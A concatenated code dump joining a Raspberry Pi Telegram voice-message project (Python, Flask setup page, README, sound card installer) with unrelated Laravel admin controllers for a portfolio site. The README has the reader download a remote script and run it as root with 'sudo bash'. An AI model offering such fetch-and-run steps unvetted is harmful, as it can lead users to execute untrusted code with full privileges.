#print(len(peer))
@client.on(events.NewMessage)
async def receiveTG(event):
global toPlay
#print(event.stringify())
fromName = '@' + event.sender.username
#only plays messages sent by your correpondant, if you want to play messages from everybody comment next line and uncomment the next next line
if (event.media.document.mime_type == 'audio/ogg') and (peer == fromName) :
#if (event.media.document.mime_type == 'audio/ogg'):
ad = await client.download_media(event.media)
#print('ok')
toPlay = toPlay + 1
#print(toPlay)
if toPlay == 0:
#os.system('/usr/bin/cvlc --play-and-exit /home/pi/LB/lovebird.wav')
os.system('/usr/bin/cvlc --play-and-exit /home/pi/LB/lovebird.wav')
name = '/home/pi/play' + str(toPlay) + '.ogg'
#print(name)
os.rename(ad,name)
await asyncio.sleep(0.2)
#os.system('/usr/bin/cvlc --play-and-exit ' + name)
"""
Main sequence (handler receiveTG), playTG, timeC, recTG, motor et heartBeat are excuted in parallel
"""
#os.system('/usr/bin/cvlc /home/pi/LB/lovebird.wav vlc://quit')
os.system('/usr/bin/cvlc --play-and-exit /home/pi/LB/lovebird.wav')
loop = asyncio.get_event_loop()
loop.create_task(recTG())
loop.create_task(playTG())
loop.create_task(timeC())
loop.create_task(motor())
loop.create_task(heartBeat())
loop.run_forever()
client.run_until_disconnected()
<file_sep>from flask import Flask, render_template, redirect, url_for, request, make_response
import datetime
import os
app = Flask(__name__)
@app.route('/',methods = ['POST', 'GET'])
def index():
now = datetime.datetime.now()
timeString = now.strftime("%H:%M:%S %d/%m/%Y")
txt = open('/boot/PEER.txt', 'r')
currentPeer = txt.read()
txt.close()
txt = open('/home/pi/phone', 'r')
currentPhone = txt.read()
txt.close()
if request.method == 'POST':
peer = request.form['peer']
if len(peer) > 0:
f = open('/boot/PEER.txt', 'w')
f.write(peer)
f.close()
os.system('sudo reboot&')
#os.system('chgrp pi /home/pi/peer')
phone = request.form['phone']
if len(phone) > 0:
f = open('/home/pi/phone', 'w')
f.write(phone)
currentPhone = phone
f.close()
os.system('chown pi /home/pi/phone')
os.system('chgrp pi /home/pi/phone')
key = request.form['key']
if len(key) > 0:
f = open('/home/pi/key', 'w')
f.write(key)
f.close()
os.system('chown pi /home/pi/key')
os.system('chgrp pi /home/pi/key')
template = {
'title' : 'LOVE BIRDS',
'time' : timeString,
'currentPeer' : currentPeer,
'currentPhone' : currentPhone
}
return render_template('index.html', **template)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80, debug=True)
<file_sep># LOVE BIRDS
## Send and receive voice messages using Raspberry PI Zero and Telegram
### What is Love (birds)?
It’s a standalone device to receive send voice messages with one person: lover, family or friend. Open the box, push on the button while you talk, release to send. Your correspondent will receive the voice message on his Telegram phone app or on his own LoveBirds box with a nice motor move and bird song.
See the video here: https://www.youtube.com/watch?v=enLJgY6dZ9U
This is the method to install from scratch the Love Birds projects. **If you want an easier installation method please follow the intructable here to just burn the prebuilt SD card:**
https://www.instructables.com/id/Love-Birds-a-Box-to-Send-and-Receive-Telegram-Audi/
or here https://www.raspiaudio.com/lovebirds/
### Ok so you want to go the hard way and rebuild it from scratch:
#### Architecture:
initWiFi ⇒ initialize wifi access takes the file on /boot/WIFI.txt (easily accessible by just editing the file with a windows computer and SD car reader) and rename it wpa_supplicant.conf and copy it /etc/wpa_supplicant/wpa_supplicant.conf
initTG.py ⇒ initialize the telegram connection, to send messages as the user. configuration is done using a web page managed by Flask that basicaly asks the user to give his Telegram phone number, the confirmation received by SMS, and the name of te correspondent (who you want to talk to).It is copying the PHONE and PEER.txt in some file used later by valentin.py
. PEER.txt the input format is @JohnBlack
. PHONE international format +33777792516
. Sms configiration file 12345
valentin.py ⇒ the application itself
#### Installation steps
-Start from a Raspbian Stretch Lite, and burn it on a SD card https://downloads.raspberrypi.org/raspbian_lite_latest
##### Required packages:
. telethon
sudo apt-get install python3-pip
sudo pip3 install telethon
. sox
sudo apt-get install sox
. vlc
sudo apt-get vlc
. GPIO
sudo apt-get install python3-gpiozero
sudo apt-get install python-rpi.gpio python3-rpi.gpio
Flask
sudo pip3 install flask
##### If you use the MIC+ sound card install it, otherwise skip this section. MIC+ it's a cool sound card has it has all in one 2 speakers, microphone and a button led. https://www.raspiaudio.com/raspiaudio-aiy
sudo wget -O mic mic.raspiaudio.com
sudo bash mic
-Say yes for the reboot
-On the next reboot you have to run the test to finish the installation (it is an ALSA oddness):
sudo wget -O test test.raspiaudio.com
sudo bash test
Push the onboard button, you should hear "Front Left" "front Right" then the recorded sequence by the microphone.
##### Start the programs on boot
Copy the content of this GIT of the directory /LB in /home/pi/LB
sudo cp /home/pi/LB/rc.local /etc
boot the sytem and start a browser from any computer of your local network to complete the configuration of Telegram (see the instructable from that point.)
<file_sep>#!/bin/bash
: <<'DISCLAIMER'
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
This script is licensed under the terms of the MIT license.
Unless otherwise noted, code reproduced herein
was written for this script.
- The PiZeroAudio Crew -
DISCLAIMER
# script control variables
productname="Rasiaudio MIC+ " # the name of the product to install
scriptname="pizeroaudio" # the name of this script
spacereq=1 # minimum size required on root partition in MB
debugmode="no" # whether the script should use debug routines
debuguser="none" # optional test git user to use in debug mode
debugpoint="none" # optional git repo branch or tag to checkout
forcesudo="yes" # whether the script requires to be ran with root privileges
promptreboot="no" # whether the script should always prompt user to reboot
mininstall="no" # whether the script enforces minimum install routine
customcmd="yes" # whether to execute commands specified before exit
armhfonly="yes" # whether the script is allowed to run on other arch
armv6="yes" # whether armv6 processors are supported
armv7="yes" # whether armv7 processors are supported
armv8="yes" # whether armv8 processors are supported
raspbianonly="no" # whether the script is allowed to run on other OSes
osreleases=( "Raspbian" ) # list os-releases supported
oswarning=( ) # list experimental os-releases
osdeny=( "Darwin" "Kali" ) # list os-releases specifically disallowed
FORCE=$1
DEVICE_TREE=true
ASK_TO_REBOOT=false
CURRENT_SETTING=false
UPDATE_DB=false
BOOTCMD=/boot/cmdline.txt
CONFIG=/boot/config.txt
APTSRC=/etc/apt/sources.list
INITABCONF=/etc/inittab
BLACKLIST=/etc/modprobe.d/raspi-blacklist.conf
LOADMOD=/etc/modules
DTBODIR=/boot/overlays
# function define
confirm() {
if [ "$FORCE" == '-y' ]; then
true
else
read -r -p "$1 [y/N] " response < /dev/tty
if [[ $response =~ ^(yes|y|Y)$ ]]; then
true
else
false
fi
fi
}
prompt() {
read -r -p "$1 [y/N] " response < /dev/tty
if [[ $response =~ ^(yes|y|Y)$ ]]; then
true
else
false
fi
}
success() {
echo -e "$(tput setaf 2)$1$(tput sgr0)"
}
inform() {
echo -e "$(tput setaf 6)$1$(tput sgr0)"
}
warning() {
echo -e "$(tput setaf 1)$1$(tput sgr0)"
}
newline() {
echo ""
}
progress() {
count=0
until [ $count -eq $1 ]; do
echo -n "..." && sleep 1
((count++))
done
echo
}
sudocheck() {
if [ $(id -u) -ne 0 ]; then
echo -e "Install must be run as root. Try 'sudo ./$scriptname'\n"
exit 1
fi
}
sysclean() {
sudo apt-get clean && sudo apt-get autoclean
sudo apt-get -y autoremove &> /dev/null
}
sysupdate() {
if ! $UPDATE_DB; then
echo "Updating apt indexes..." && progress 3 &
sudo apt-get update 1> /dev/null || { warning "Apt failed to update indexes!" && exit 1; }
echo "Reading package lists..."
progress 3 && UPDATE_DB=true
fi
}
sysupgrade() {
sudo apt-get upgrade
sudo apt-get clean && sudo apt-get autoclean
sudo apt-get -y autoremove &> /dev/null
}
sysreboot() {
warning "Some changes made to your system require"
warning "your computer to reboot to take effect."
newline
if prompt "Would you like to reboot now?"; then
sync && sudo reboot
fi
}
arch_check() {
IS_ARMHF=false
IS_ARMv6=false
if uname -m | grep "armv.l" > /dev/null; then
IS_ARMHF=true
if uname -m | grep "armv6l" > /dev/null; then
IS_ARMv6=true
fi
fi
}
os_check() {
IS_RASPBIAN=false
IS_MACOSX=false
IS_SUPPORTED=false
IS_EXPERIMENTAL=false
if [ -f /etc/os-release ]; then
if cat /etc/os-release | grep "Raspbian" > /dev/null; then
IS_RASPBIAN=true && IS_SUPPORTED=true
fi
if command -v apt-get > /dev/null; then
for os in ${osreleases[@]}; do
if cat /etc/os-release | grep $os > /dev/null; then
IS_SUPPORTED=true && IS_EXPERIMENTAL=false
fi
done
for os in ${oswarning[@]}; do
if cat /etc/os-release | grep $os > /dev/null; then
IS_SUPPORTED=true && IS_EXPERIMENTAL=false
fi
done
for os in ${osdeny[@]}; do
if cat /etc/os-release | grep $os > /dev/null; then
IS_SUPPORTED=false && IS_EXPERIMENTAL=false
fi
done
fi
fi
if [ -d ~/.kano-settings ] || [ -d ~/.kanoprofile ]; then
IS_RASPBIAN=false
for os in ${oswarning[@]}; do
if [ $os == "Kano" ]; then
IS_SUPPORTED=false && IS_EXPERIMENTAL=true
fi
done
for os in ${osdeny[@]}; do
if [ $os == "Kano" ]; then
IS_SUPPORTED=false && IS_EXPERIMENTAL=false
fi
done
fi
if [ -f ~/.pt-dashboard-config ] || [ -d ~/.pt-dashboard ]; then
IS_RASPBIAN=false
for os in ${oswarning[@]}; do
if [ $os == "PiTop" ]; then
IS_SUPPORTED=false && IS_EXPERIMENTAL=true
fi
done
for os in ${osdeny[@]}; do
if [ $os == "PiTop" ]; then
IS_SUPPORTED=false && IS_EXPERIMENTAL=false
fi
done
fi
if [ -d ~/.config/ubuntu-mate ]; then
for os in ${osdeny[@]}; do
if [ $os == "Mate" ]; then
IS_SUPPORTED=false && IS_EXPERIMENTAL=false
fi
done
fi
if uname -s | grep "Darwin" > /dev/null; then
IS_MACOSX=true
for os in ${osdeny[@]}; do
if [ $os == "Darwin" ]; then
IS_SUPPORTED=false && IS_EXPERIMENTAL=false
fi
done
fi
}
raspbian_check() {
IS_SUPPORTED=false
IS_EXPERIMENTAL=false
if [ -f /etc/os-release ]; then
if cat /etc/os-release | grep "/sid" > /dev/null; then
IS_SUPPORTED=true && IS_EXPERIMENTAL=false
elif cat /etc/os-release | grep "stretch" > /dev/null; then
IS_SUPPORTED=true && IS_EXPERIMENTAL=false
elif cat /etc/os-release | grep "jessie" > /dev/null; then
IS_SUPPORTED=true && IS_EXPERIMENTAL=false
elif cat /etc/os-release | grep "wheezy" > /dev/null; then
IS_SUPPORTED=true && IS_EXPERIMENTAL=false
else
IS_SUPPORTED=false && IS_EXPERIMENTAL=false
fi
fi
}
: <<'MAINSTART'
Perform all global variables declarations as well as function definition
above this section for clarity, thanks!
MAINSTART
# checks and init
arch_check
os_check
if [ $debugmode != "no" ]; then
echo "USER_HOME is $USER_HOME" && newline
echo "IS_RASPBIAN is $IS_RASPBIAN"
echo "IS_MACOSX is $IS_MACOSX"
echo "IS_SUPPORTED is $IS_SUPPORTED"
echo "IS_EXPERIMENTAL is $IS_EXPERIMENTAL"
newline
fi
if ! $IS_ARMHF; then
warning "This hardware is not supported, sorry!"
warning "Config files have been left untouched"
newline && exit 1
fi
if $IS_ARMv8 && [ $armv8 == "no" ]; then
warning "Sorry, your CPU is not supported by this installer"
newline && exit 1
elif $IS_ARMv7 && [ $armv7 == "no" ]; then
warning "Sorry, your CPU is not supported by this installer"
newline && exit 1
elif $IS_ARMv6 && [ $armv6 == "no" ]; then
warning "Sorry, your CPU is not supported by this installer"
newline && exit 1
fi
if [ $raspbianonly == "yes" ] && ! $IS_RASPBIAN;then
warning "This script is intended for Raspbian on a Raspberry Pi!"
newline && exit 1
fi
if $IS_RASPBIAN; then
raspbian_check
if ! $IS_SUPPORTED && ! $IS_EXPERIMENTAL; then
newline && warning "--- Warning ---" && newline
echo "The $productname installer"
echo "does not work on this version of Raspbian."
echo "Check https://github.com/$gitusername/$gitreponame"
echo "for additional information and support"
newline && exit 1
fi
fi
if ! $IS_SUPPORTED && ! $IS_EXPERIMENTAL; then
warning "Your operating system is not supported, sorry!"
newline && exit 1
fi
if $IS_EXPERIMENTAL; then
warning "Support for your operating system is experimental. Please visit"
newline
fi
if [ $forcesudo == "yes" ]; then
sudocheck
fi
newline
echo "This script will install everything needed to use"
echo "$productname"
newline
if confirm "Do you wish to continue?"; then
newline
echo "Checking hardware requirements..."
if [ -e $CONFIG ] && grep -q "^device_tree=$" $CONFIG; then
DEVICE_TREE=false
fi
if $DEVICE_TREE; then
newline
echo "Adding Device Tree Entry to $CONFIG"
if [ -e $CONFIG ] && grep -q "^dtoverlay=hifiberry-dac$" $CONFIG; then
echo "dtoverlay already active"
sudo sed -i -e '/^dtoverlay=hifiberry-dac/d' $CONFIG
fi
if [ -e $CONFIG ] && grep -q "^dtoverlay=googlevoicehat-soundcard$" $CONFIG; then
echo "dtoverlay already active"
else
echo "dtoverlay=googlevoicehat-soundcard" | sudo tee -a $CONFIG
ASK_TO_REBOOT=true
fi
if [ -e $BLACKLIST ]; then
newline
echo "Commenting out Blacklist entry in "
echo "$BLACKLIST"
sudo sed -i -e "s|^blacklist[[:space:]]*i2c-bcm2708.*|#blacklist i2c-bcm2708|" \
-e "s|^blacklist[[:space:]]*snd-soc-pcm512x.*|#blacklist snd-soc-pcm512x|" \
-e "s|^blacklist[[:space:]]*snd-soc-wm8804.*|#blacklist snd-soc-wm8804|" $BLACKLIST &> /dev/null
fi
else
newline
echo "No Device Tree Detected, not supported"
newline
exit 1
fi
if [ -e $CONFIG ] && grep -q -E "^dtparam=audio=on$" $CONFIG; then
bcm2835off="no"
newline
echo "Disabling default sound driver"
sudo sed -i "s|^dtparam=audio=on$|#dtparam=audio=on|" $CONFIG &> /dev/null
if [ -e $LOADMOD ] && grep -q "^snd-bcm2835" $LOADMOD; then
sudo sed -i "s|^snd-bcm2835|#snd-bcm2835|" $LOADMOD &> /dev/null
fi
ASK_TO_REBOOT=true
elif [ -e $LOADMOD ] && grep -q "^snd-bcm2835" $LOADMOD; then
bcm2835off="no"
newline
echo "Disabling default sound module"
sudo sed -i "s|^snd-bcm2835|#snd-bcm2835|" $LOADMOD &> /dev/null
ASK_TO_REBOOT=true
else
newline
echo "Default sound driver currently not loaded"
bcm2835off="yes"
fi
echo "Configuring sound output"
if [ -e /etc/asound.conf ]; then
if [ -e /etc/asound.conf.old ]; then
sudo rm -f /etc/asound.conf.old
fi
sudo mv /etc/asound.conf /etc/asound.conf.old
fi
sudo echo -e "options snd_rpi_googlevoicehat_soundcard index=0\n" > ~/asound.conf
sudo echo -e "pcm.softvol {\ntype softvol" >> ~/asound.conf
sudo echo -e "slave.pcm dmix \ncontrol{" >> ~/asound.conf
sudo echo -e "name Master\ncard 0\n}\n}\n" >>~/asound.conf
sudo echo -e "pcm.micboost{\ntype softvol" >>~/asound.conf
sudo echo -e "slave.pcm dsnoop\ncontrol {" >>~/asound.conf
sudo echo -e "name Micro\ncard 0\n}" >>~/asound.conf
sudo echo -e "min_dB -10.0" >>~/asound.conf
sudo echo -e "max_dB 50.0" >>~/asound.conf
sudo echo -e "resolution 256}\n" >>~/asound.conf
sudo echo -e "pcm.!default { \ntype asym" >>~/asound.conf
sudo echo -e "playback.pcm \042plug:softvol\042" >>~/asound.conf
sudo echo -e "capture.pcm \042plug:micboost\042\n}\n" >>~/asound.conf
sudo echo -e "ctl.!default {\ntype hw\ncard 0\n}\n" >>~/asound.conf
sudo mv ~/asound.conf /etc/asound.conf
sudo cp /etc/asound.conf /home/pi/.asoundrc
sleep 1
sudo chown pi /home/pi/.asoundrc
sudo chgrp pi /home/pi/.asoundrc
if [ $promptreboot == "yes" ] || $ASK_TO_REBOOT; then
sysreboot
fi
else
newline
echo "Aborting..."
newline
fi
exit 0
|
0da6ee4b29d7db2db0b46ad7101f5b7a6379908d
|
[
"Markdown",
"C",
"Python",
"Shell"
] | 7
|
Shell
|
AzureMentor/LoveBirds
|
8472fbe42f414e04022cabf522f6d9241cae7f74
|
00684f141e765b0218a55a8833a49d7606d18e9f
|
refs/heads/master
|
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Skilllang;
use App\Http\Requests\CreateSkilllangRequest;
use App\Http\Requests\UpdateSkilllangRequest;
use Illuminate\Http\Request;
use App\User;
class SkilllangController extends Controller {
/**
* Display a listing of skilllang
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$skilllang = Skilllang::with("user")->get();
return view('admin.skilllang.index', compact('skilllang'));
}
/**
* Show the form for creating a new skilllang
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
$skill_range = Skilllang::$skill_range;
return view('admin.skilllang.create', compact("user", "skill_range"));
}
/**
* Store a newly created skilllang in storage.
*
* @param CreateSkilllangRequest|Request $request
*/
public function store(CreateSkilllangRequest $request)
{
Skilllang::create($request->all());
return redirect()->route(config('quickadmin.route').'.skilllang.index');
}
/**
* Show the form for editing the specified skilllang.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$skilllang = Skilllang::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
$skill_range = Skilllang::$skill_range;
return view('admin.skilllang.edit', compact('skilllang', "user", "skill_range"));
}
/**
* Update the specified skilllang in storage.
* @param UpdateSkilllangRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateSkilllangRequest $request)
{
$skilllang = Skilllang::findOrFail($id);
$skilllang->update($request->all());
return redirect()->route(config('quickadmin.route').'.skilllang.index');
}
/**
* Remove the specified skilllang from storage.
*
* @param int $id
*/
public function destroy($id)
{
Skilllang::destroy($id);
return redirect()->route(config('quickadmin.route').'.skilllang.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Skilllang::destroy($toDelete);
} else {
Skilllang::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.skilllang.index');
}
}
<file_sep><?php
namespace App;
use Illuminate\Database\Eloquent\Model;
use Laraveldaily\Quickadmin\Observers\UserActionsObserver;
class Status extends Model {
protected $table = 'status';
protected $fillable = [
'user_id',
'icon',
'detail'
];
public static $icon = ["green-marker" => "green-marker", "red-marker" => "red-marker", "orange-marker" => "orange-marker"];
public static function boot()
{
parent::boot();
Status::observe(new UserActionsObserver);
}
public function user()
{
return $this->hasOne('App\User', 'id', 'user_id');
}
}<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Catportfolio;
use App\Http\Requests\CreateCatportfolioRequest;
use App\Http\Requests\UpdateCatportfolioRequest;
use Illuminate\Http\Request;
class CatportfolioController extends Controller {
/**
* Display a listing of catportfolio
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$catportfolio = Catportfolio::all();
return view('admin.catportfolio.index', compact('catportfolio'));
}
/**
* Show the form for creating a new catportfolio
*
* @return \Illuminate\View\View
*/
public function create()
{
return view('admin.catportfolio.create');
}
/**
* Store a newly created catportfolio in storage.
*
* @param CreateCatportfolioRequest|Request $request
*/
public function store(CreateCatportfolioRequest $request)
{
Catportfolio::create($request->all());
return redirect()->route(config('quickadmin.route').'.catportfolio.index');
}
/**
* Show the form for editing the specified catportfolio.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$catportfolio = Catportfolio::find($id);
return view('admin.catportfolio.edit', compact('catportfolio'));
}
/**
* Update the specified catportfolio in storage.
* @param UpdateCatportfolioRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateCatportfolioRequest $request)
{
$catportfolio = Catportfolio::findOrFail($id);
$catportfolio->update($request->all());
return redirect()->route(config('quickadmin.route').'.catportfolio.index');
}
/**
* Remove the specified catportfolio from storage.
*
* @param int $id
*/
public function destroy($id)
{
Catportfolio::destroy($id);
return redirect()->route(config('quickadmin.route').'.catportfolio.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Catportfolio::destroy($toDelete);
} else {
Catportfolio::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.catportfolio.index');
}
}
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Skilladd;
use App\Http\Requests\CreateSkilladdRequest;
use App\Http\Requests\UpdateSkilladdRequest;
use Illuminate\Http\Request;
use App\User;
class SkilladdController extends Controller {
/**
* Display a listing of skilladd
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$skilladd = Skilladd::with("user")->get();
return view('admin.skilladd.index', compact('skilladd'));
}
/**
* Show the form for creating a new skilladd
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.skilladd.create', compact("user"));
}
/**
* Store a newly created skilladd in storage.
*
* @param CreateSkilladdRequest|Request $request
*/
public function store(CreateSkilladdRequest $request)
{
Skilladd::create($request->all());
return redirect()->route(config('quickadmin.route').'.skilladd.index');
}
/**
* Show the form for editing the specified skilladd.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$skilladd = Skilladd::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.skilladd.edit', compact('skilladd', "user"));
}
/**
* Update the specified skilladd in storage.
* @param UpdateSkilladdRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateSkilladdRequest $request)
{
$skilladd = Skilladd::findOrFail($id);
$skilladd->update($request->all());
return redirect()->route(config('quickadmin.route').'.skilladd.index');
}
/**
* Remove the specified skilladd from storage.
*
* @param int $id
*/
public function destroy($id)
{
Skilladd::destroy($id);
return redirect()->route(config('quickadmin.route').'.skilladd.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Skilladd::destroy($toDelete);
} else {
Skilladd::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.skilladd.index');
}
}
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Bcat;
use App\Http\Requests\CreateBcatRequest;
use App\Http\Requests\UpdateBcatRequest;
use Illuminate\Http\Request;
class BcatController extends Controller {
/**
* Display a listing of bcat
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$bcat = Bcat::all();
return view('admin.bcat.index', compact('bcat'));
}
/**
* Show the form for creating a new bcat
*
* @return \Illuminate\View\View
*/
public function create()
{
return view('admin.bcat.create');
}
/**
* Store a newly created bcat in storage.
*
* @param CreateBcatRequest|Request $request
*/
public function store(CreateBcatRequest $request)
{
Bcat::create($request->all());
return redirect()->route(config('quickadmin.route').'.bcat.index');
}
/**
* Show the form for editing the specified bcat.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$bcat = Bcat::find($id);
return view('admin.bcat.edit', compact('bcat'));
}
/**
* Update the specified bcat in storage.
* @param UpdateBcatRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateBcatRequest $request)
{
$bcat = Bcat::findOrFail($id);
$bcat->update($request->all());
return redirect()->route(config('quickadmin.route').'.bcat.index');
}
/**
* Remove the specified bcat from storage.
*
* @param int $id
*/
public function destroy($id)
{
Bcat::destroy($id);
return redirect()->route(config('quickadmin.route').'.bcat.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Bcat::destroy($toDelete);
} else {
Bcat::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.bcat.index');
}
}
<file_sep><?php
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| This file is where you may define all of the routes that are handled
| by your application. Just tell Laravel the URIs it should respond
| to using a Closure or controller method. Build something great!
|
*/
//Route::get('/', function () {
// return view('welcome');
//});
Route::get('/404', function () {
return view('errors/404');
});
Route::get('/post', function () {
return view('front-end/post-img');
});
Route::get('custom-pagination','BlogController@index');
//route middleware group
Route::group(['middleware'=>['web']], function()
{
Route::resource('/','HomeController');
Route::resource('/profile','ProfileController');
Route::resource('/resume','ResumeController');
Route::resource('/portfolio','PortfolioController');
Route::resource('/blog','BlogController');
Route::resource('/category','CategoryController');
Route::resource('/contact','ContactController');
});<file_sep><?php
namespace App;
use Illuminate\Database\Eloquent\Model;
use Laraveldaily\Quickadmin\Observers\UserActionsObserver;
use Illuminate\Database\Eloquent\SoftDeletes;
class Blog1 extends Model {
use SoftDeletes;
/**
* The attributes that should be mutated to dates.
*
* @var array
*/
protected $dates = ['deleted_at'];
protected $table = 'blog1';
protected $fillable = [
'bcat_id',
'user_id',
'title',
'pict',
'desc',
'isi'
];
public static function boot()
{
parent::boot();
Blog1::observe(new UserActionsObserver);
}
public function bcat()
{
return $this->hasOne('App\Bcat', 'id', 'bcat_id');
}
public function user()
{
return $this->hasOne('App\User', 'id', 'user_id');
}
}<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Hobby;
use App\Http\Requests\CreateHobbyRequest;
use App\Http\Requests\UpdateHobbyRequest;
use Illuminate\Http\Request;
use App\User;
class HobbyController extends Controller {
/**
* Display a listing of hobby
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$hobby = Hobby::with("user")->get();
return view('admin.hobby.index', compact('hobby'));
}
/**
* Show the form for creating a new hobby
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.hobby.create', compact("user"));
}
/**
* Store a newly created hobby in storage.
*
* @param CreateHobbyRequest|Request $request
*/
public function store(CreateHobbyRequest $request)
{
Hobby::create($request->all());
return redirect()->route(config('quickadmin.route').'.hobby.index');
}
/**
* Show the form for editing the specified hobby.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$hobby = Hobby::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.hobby.edit', compact('hobby', "user"));
}
/**
* Update the specified hobby in storage.
* @param UpdateHobbyRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateHobbyRequest $request)
{
$hobby = Hobby::findOrFail($id);
$hobby->update($request->all());
return redirect()->route(config('quickadmin.route').'.hobby.index');
}
/**
* Remove the specified hobby from storage.
*
* @param int $id
*/
public function destroy($id)
{
Hobby::destroy($id);
return redirect()->route(config('quickadmin.route').'.hobby.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Hobby::destroy($toDelete);
} else {
Hobby::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.hobby.index');
}
}
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Education;
use App\Http\Requests\CreateEducationRequest;
use App\Http\Requests\UpdateEducationRequest;
use Illuminate\Http\Request;
use App\User;
class EducationController extends Controller {
/**
* Display a listing of education
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$education = Education::with("user")->get();
return view('admin.education.index', compact('education'));
}
/**
* Show the form for creating a new education
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.education.create', compact("user"));
}
/**
* Store a newly created education in storage.
*
* @param CreateEducationRequest|Request $request
*/
public function store(CreateEducationRequest $request)
{
Education::create($request->all());
return redirect()->route(config('quickadmin.route').'.education.index');
}
/**
* Show the form for editing the specified education.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$education = Education::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.education.edit', compact('education', "user"));
}
/**
* Update the specified education in storage.
* @param UpdateEducationRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateEducationRequest $request)
{
$education = Education::findOrFail($id);
$education->update($request->all());
return redirect()->route(config('quickadmin.route').'.education.index');
}
/**
* Remove the specified education from storage.
*
* @param int $id
*/
public function destroy($id)
{
Education::destroy($id);
return redirect()->route(config('quickadmin.route').'.education.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Education::destroy($toDelete);
} else {
Education::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.education.index');
}
}
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Status;
use App\Http\Requests\CreateStatusRequest;
use App\Http\Requests\UpdateStatusRequest;
use Illuminate\Http\Request;
use App\User;
class StatusController extends Controller {
/**
* Display a listing of status
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$status = Status::with("user")->get();
return view('admin.status.index', compact('status'));
}
/**
* Show the form for creating a new status
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
$icon = Status::$icon;
return view('admin.status.create', compact("user", "icon"));
}
/**
